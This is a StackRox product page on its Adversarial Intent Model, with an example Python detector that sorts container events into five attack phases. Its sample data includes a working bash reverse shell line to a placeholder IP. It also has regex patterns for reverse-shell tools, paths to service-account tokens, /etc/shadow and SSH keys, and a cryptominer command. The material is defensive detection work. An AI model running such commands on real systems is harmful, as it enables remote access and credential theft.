StackRox Adversarial Intent Model (AIM)
StackRox AIM captures a core philosophy: defensive strategy should be built from an offensive perspective.
By examining application deployments through the attacker's lens, StackRox exposes threats by fusing together signals from container environments that correspond to the five iterative phases of an attack lifecycle: foothold, persistence, privilege escalation, lateral movement, and objectives.
StackRox is built around a detailed model of container attacks and detects a broad range of adversary behaviors in each phase of the AIM:
| Phase | Example adversary behaviors detected |
|---|---|
| Foothold | Reverse shell invocation, Java-based code injection attacks |
| Persistence | Database persistence via posting of database procedures, user persistence via modification of PAM configurations |
| Privilege Escalation | Execution of setuid/setgid binaries by non-root users |
| Lateral Movement | Anomalous network communication with a client followed by payload execution or unexpected process cloning |
| Objectives | Cryptocurrency mining software, exfiltration of sensitive content via reading stored secrets or accessing confidential file paths |
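As an added illustration of the signal fusion the model describes, here is a small correlator that tags a constructed stream of container runtime events with the five phases in the table. This is example code written for this page, not StackRox's detection engine: the event schema, the indicator patterns, the PAM and secret paths, the miner names and the 30-second correlation window are all assumptions, and the Java code injection and process-cloning rows of the table are not modeled. The lateral-movement row is the interesting one, because it cannot be matched on a single event; the example keeps per-container state so that an inbound connection from a peer outside the baseline is only raised once a payload is executed after it.

```python
"""Added example (not StackRox code): tag container runtime events with the
AIM phase they correspond to, and correlate an anomalous inbound connection
with a follow-on exec for the lateral-movement row. The event schema, paths,
patterns and the 30-second window are assumptions made for this example."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class Event:
    ts: float                  # seconds since an arbitrary epoch
    container: str             # container or pod identity
    kind: str                  # "exec", "net" or "file"
    uid: int = 0               # uid that performed the action
    cmd: str = ""              # exec: full command line
    setuid_bit: bool = False   # exec: target binary carries setuid/setgid
    peer: str = ""             # net: remote address
    inbound: bool = False      # net: connection opened by the remote side
    path: str = ""             # file: path touched
    op: str = ""               # file: "read" or "write"


@dataclass
class Alert:
    ts: float
    container: str
    phase: str
    reason: str


# Assumed indicators for the example; a real policy engine carries far richer ones.
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bncat\b.*\s-e\s|\bsocat\b.*\bexec:")
MINERS = {"xmrig", "minerd", "cpuminer"}
PAM_PATHS = ("/etc/pam.d/", "/etc/security/")
SECRET_PATHS = ("/var/run/secrets/kubernetes.io/serviceaccount/", "/etc/shadow", "/root/.ssh/")
LATERAL_WINDOW = 30.0  # seconds allowed between inbound connection and payload execution


def classify(events: List[Event], baseline_peers: Set[str]) -> List[Alert]:
    """Walk events in time order and emit one Alert per matched AIM signal."""
    alerts: List[Alert] = []
    # Per container: the most recent inbound connection from a peer outside the baseline,
    # waiting to be paired with the next exec in that container.
    pending_inbound: Dict[str, Event] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "net":
            if ev.inbound and ev.peer not in baseline_peers:
                pending_inbound[ev.container] = ev
        elif ev.kind == "file":
            if ev.op == "write" and ev.path.startswith(PAM_PATHS):
                alerts.append(Alert(ev.ts, ev.container, "persistence", f"write to {ev.path}"))
            elif ev.op == "read" and ev.path.startswith(SECRET_PATHS):
                alerts.append(Alert(ev.ts, ev.container, "objectives", f"read of {ev.path}"))
        elif ev.kind == "exec":
            argv = ev.cmd.split()
            base = argv[0].rsplit("/", 1)[-1] if argv else ""
            if REVERSE_SHELL.search(ev.cmd):
                alerts.append(Alert(ev.ts, ev.container, "foothold", "reverse shell invocation"))
            if ev.setuid_bit and ev.uid != 0:
                alerts.append(Alert(ev.ts, ev.container, "privilege_escalation",
                                    f"setuid/setgid binary {base} run by uid {ev.uid}"))
            if base in MINERS:
                alerts.append(Alert(ev.ts, ev.container, "objectives", f"cryptominer {base}"))
            # The first exec after an anomalous inbound connection is the candidate payload;
            # popping clears the state whether or not it lands inside the window.
            prior = pending_inbound.pop(ev.container, None)
            if prior is not None and ev.ts - prior.ts <= LATERAL_WINDOW:
                alerts.append(Alert(ev.ts, ev.container, "lateral_movement",
                                    f"exec of {base} {ev.ts - prior.ts:.0f}s after inbound "
                                    f"connection from {prior.peer}"))
    return alerts


# Constructed sample stream: a compromised web pod, a database pod reached from it,
# and a benign API pod whose inbound peer is part of the learned baseline.
SAMPLE_EVENTS = [
    Event(ts=100, container="web-7f9c", kind="exec", uid=1000,
          cmd="bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"),
    Event(ts=105, container="web-7f9c", kind="exec", uid=1000,
          cmd="/usr/bin/passwd", setuid_bit=True),
    Event(ts=110, container="web-7f9c", kind="file", uid=0,
          path="/etc/pam.d/sshd", op="write"),
    Event(ts=200, container="db-0", kind="net", peer="10.0.3.17", inbound=True),
    Event(ts=205, container="db-0", kind="exec", uid=0, cmd="/tmp/.x/payload"),
    Event(ts=300, container="db-0", kind="exec", uid=0, cmd="/tmp/xmrig -o pool.example:3333"),
    Event(ts=310, container="db-0", kind="file", uid=0,
          path="/var/run/secrets/kubernetes.io/serviceaccount/token", op="read"),
    Event(ts=400, container="api-1", kind="net", peer="10.0.0.5", inbound=True),
    Event(ts=401, container="api-1", kind="exec", uid=0, cmd="/usr/bin/python3 app.py"),
]
BASELINE_PEERS = {"10.0.0.5"}


def phases_for(container: str, alerts: List[Alert]) -> List[str]:
    """Phases raised for one container, in event order."""
    return [a.phase for a in alerts if a.container == container]


if __name__ == "__main__":
    for a in classify(SAMPLE_EVENTS, BASELINE_PEERS):
        print(f"{a.ts:>6.0f}  {a.container:<10} {a.phase:<20} {a.reason}")
```

Run stand-alone, the script prints six alerts: foothold, privilege escalation and persistence for the web pod, then lateral movement and two objectives hits for the database pod; the API pod raises nothing because its inbound peer is in the baseline, which is the point of pairing network and process signals rather than alerting on either alone.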